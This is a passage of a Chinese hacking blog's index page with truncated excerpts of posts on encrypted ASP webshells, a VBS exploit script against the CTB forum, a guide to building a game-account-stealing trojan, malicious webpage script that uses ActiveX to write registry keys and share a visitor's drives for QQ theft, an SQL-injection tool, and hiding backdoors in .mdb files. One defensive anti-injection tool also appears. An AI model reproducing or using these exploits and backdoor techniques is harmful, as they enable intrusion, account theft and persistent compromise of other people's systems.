再谈 ASP 牧马

作者:Tendy
来源:邪恶八进制安全小组

没有什么技术可然。高手就别看了。 :)前几天看了几篇关于ASP木马的文章。小弟也喜欢养马。呵呵。不过我养的马一般是关在家里。很少放出去哦。好了。题外话就说到这里。
大家用的和见过的ASP马有很多。如:海泮、蓝屏、老兵的ASP助手。还有种种各位大侠自已修改或美化的一些马。呵呵。。我也很喜欢美化马。打造自已的马。在这里我就写了。相信大家都看了三少写的"轻轻松松打造属于自己的ASP木马"! http://www.eviloctal.com/forum/read.php?tid=2804&fpage=1

一:首先我来说一下加密ASP马
1.前次小弟没事做入侵了一站点。呵呵。。不过我什么也没做哦。不过那站点早被别人玩过的/我看到上面还有一个马。大家都知道。这个马对自已当然不利。 阅读全文 »

Tags:

ctb论坛利用程序vbs版

软件作者:lcx

url=inputbox("请输入ctb论坛地址,例http://www.col-e.net/ylj/ctb")
if url="" then
msgbox ("未输入地址")
wscript.quit
end if

Set oXMLHttpRequest = CreateObject("Msxml2.XMLHTTP")
oXMLHttpRequest.Open "GET", url&"/index.php?mods=member&action=info&id="&chr(46)&chr(47)&chr(108)&chr(105)&chr(115)&chr(116), False, False
oXMLHttpRequest.Send
str=oXMLHttpRequest.ResponseText
Wscript.Echo replace(MID(str,instr 阅读全文 »

Tags: ,

传奇木马DIY

文章作者:xyzreg[E.S.T]
信息来源:邪恶八进制 中国

注:此文已发表在《黑客防线》2005年第3期上,版权归其所有

网络上的传奇木马屡见不鲜,一个服务端甚至卖到几百元,而源代码更是以几千元甚至更高的价钱出售。为何身价这么高呢?因为传奇木马要实现窃取区域、服务器、人物装备等信息的效果,不仅仅是简单的键盘记录,有时还需运用内存搜索、网络数据包嗅探等技术,所以写起来相对而言有点难度,但这并不代表编写传奇木马的技术就有多难。今天笔者就来解析解析,讲解一下怎样编写传奇木马,同时希望借分析这种木马的功能实现而有游戏厂商能防止这种盗号 ,让广大游戏爱好者真正拥有一片纯净的游戏空间。

我们这个程序具有以下功能:获取“ 传奇”游戏的登录信息:区号、登录账号、密码、服务器名,并发送到指定的邮箱。设置自动运行键值后,此木马服务端就随系统启动并一直运行着,如果同时设置了关联启动,则得到一次的信息 阅读全文 »

Tags:

黑客通过网页窃取QQ方法解析

  要想偷别人的QQ,方法有很多了。利用恶意网页使对方的电脑被共享出来是很有趣的一招。方法是:在你的网站网页中加入如下内容的代码:

<script language=Java Script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f()
{*********************];
al.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
al.createlnstance()
Shl=al.GetObject() Shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\Lan 阅读全文 »

CADT 1.0 + 演示动画

CADT 1.0 + 演示动画 548kb 20050422cadt.zip

利用MSSQL的Openrowset实现注入点信息的读取,需要目标数据库服务器可以向外连接别的服务器。
你可以随意分发复制该软件,但是请保留版权信息。
请不要将此软件用于非法用途,触犯法律后果自负。
by:superhei modify:xiaolu
http://4ngel.net
http://666w.com

下载:http://soft.hackbase.com/41/20050422/6620.html

Tags:

X-Scan-v3.2 4.20修正版

优化主程序,升级并优化攻击脚本引擎,增加ARP查询、WHOIS查询等辅助工具;增加HTTP/TELNET/SSH/VNC/CVS/IMAP/NNTP等弱口令检测插件;修正已知BUG。

下载:http://www.xfocus.net/tools/200504/1016.html

Tags:

SQL通用防注入系统3.0(asp)版

来源:http://www.Neeao.com

SQL通用防注入系统3.0(asp)
发现问题请到: Neeao's Guestbook提出,谢谢你的支持!
2.0增强版 增加了自动封注入者Ip功能,使注入者不能再访问本站!
3.0版 在2.0增强版的基础上,加入了后台管理功能:
可以查看入侵者提交数据记录功能,解除对注入者ip封锁,以及删除注入记录功能!

文件说明:
Neeao_SqlIn.Asp 防SQl注入主文件,需要注意以下几点:

Neeao_sql_admin.asp 后台管理文件
注意:请用记事本打开Neeao_sql_admin.asp修改里面的管理密码!

使用方法很简单,,
只要在需要防注入的页面头部用
<!–#Include File="Neeao_SqlIn.Asp"–>
阅读全文 »

巧妙利用.mdb后缀数据库做后门

作者:FireFox [F.S.T] 来源:火狐技术联盟 www.wrsky.com

引言:好长时间了,从刚开始的站点管理器到现在流行的几款asp后门,相信大多网管都能说出这些经典webshell的名字,如海洋、老兵、蓝屏等,也相信大多数的网管学会了关键字的搜索方法来搜索这些木马,当然现在的时间如果再象隐藏后门就要讲些技巧啦,俗话说的好“佛高一尺,我高一丈”。

我不否认n早前的那个把asp木马写到图片文件中不失为一种好的方法,其实不仅可以写到图片啦 写到mp3文件里写到doc文件里都是可以的啦
copy 文件名/参数 + 文件名/参数 生成文件名
这样的方法可以很灵活的运用来达到隐藏文件的目的,具体的参数就是/a以acsic码方式,/b二进制方式,就不罗嗦这些了,至于如何上传webshell,什么是webshell也不属于本文的讨论范围。今天要讲的是如何把后门放到后缀.mdb的数据库中,前提是在我们拿到
阅读全文 »

Tags: ,